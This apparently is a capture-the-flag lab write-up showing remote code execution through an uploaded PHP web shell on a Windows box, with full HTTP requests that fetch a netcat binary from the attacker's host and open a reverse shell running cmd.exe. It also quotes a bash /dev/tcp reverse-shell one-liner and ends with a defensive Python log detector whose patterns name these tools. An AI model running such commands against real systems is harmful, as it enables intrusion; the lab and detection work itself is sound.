
Remote Code Execution

We can run a few basic commands through the web shell to confirm that our commands execute as the www-data user.

Whoami

Upload nc.exe for reverse shell

Since this is a Windows box, we cannot use the usual bash -i >& /dev/tcp/<ip>/<port> 0>&1 one-liner. The next simplest option is to upload a netcat binary and have it call back to us.

GET /portal/uploads/nothing.php?cmd=powershell+-command+"wget+<ip>:<port>/nc64.exe+-O+nc64.exe" HTTP/1.1
Host: 10.10.10.228
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

There is a cron job that deletes any executable from the uploads directory, so we have to be fast: the binary must be used before the cleanup runs.

Initiate the reverse shell

GET /portal/uploads/nothing.php?cmd=nc64.exe+<LHOST>+<LPORT>+-e+cmd.exe HTTP/1.1
Host: 10.10.10.228
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

Obtain the shell

Reverse shell success!

We can then continue to explore the Windows machine.
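From the defender's side, the two requests above leave a distinctive trace in the web server's access log. The following is an added example, not part of the original write-up: it parses constructed combined-format log lines modelled on those requests and flags scripts executed from the uploads directory with a cmd parameter. The log format, the indicator patterns and the 10.10.14.5 attacker address are assumptions.

```python
# Added detection example: flag web-shell command execution in access logs.
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client, timestamp, request line, status, size (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Patterns worth flagging inside a decoded command value (assumed indicator set).
INDICATORS = {
    "download_tooling": re.compile(r"\b(wget|curl|certutil|Invoke-WebRequest|iwr)\b", re.I),
    "reverse_shell":    re.compile(r"\b(nc|nc64|ncat)(\.exe)?\b.*\s-e\s", re.I),
    "recon":            re.compile(r"^\s*(whoami|ipconfig|systeminfo|net\s+user)\b", re.I),
}

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(line):
    """Return a finding for a suspicious request, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = urlsplit(rec["target"])
    # A PHP script executing out of an upload directory is the core signal.
    if "/uploads/" not in parts.path or not parts.path.endswith(".php"):
        return None
    cmd = parse_qs(parts.query).get("cmd")
    if not cmd:
        return None
    decoded = cmd[0]  # parse_qs percent-decodes and turns '+' into spaces
    tags = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"ip": rec["ip"], "path": parts.path, "cmd": decoded, "tags": tags or ["webshell_cmd"]}

def scan(lines):
    return [f for f in (analyze(l) for l in lines) if f]

# Constructed sample lines modelled on the requests in this write-up.
SAMPLE_LOG = [
    '10.10.14.5 - - [12/Jul/2021:10:01:02 +0000] "GET /portal/php/files.php HTTP/1.1" 200 512',
    '10.10.14.5 - - [12/Jul/2021:10:01:10 +0000] "GET /portal/uploads/nothing.php?cmd=whoami HTTP/1.1" 200 18',
    '10.10.14.5 - - [12/Jul/2021:10:01:30 +0000] "GET /portal/uploads/nothing.php?cmd=powershell+-command+%22wget+10.10.14.5:8000/nc64.exe+-O+nc64.exe%22 HTTP/1.1" 200 0',
    '10.10.14.5 - - [12/Jul/2021:10:01:45 +0000] "GET /portal/uploads/nothing.php?cmd=nc64.exe+10.10.14.5+4444+-e+cmd.exe HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A real deployment would also correlate the flagged request timestamps with process-creation events for the web server worker spawning powershell.exe or nc64.exe.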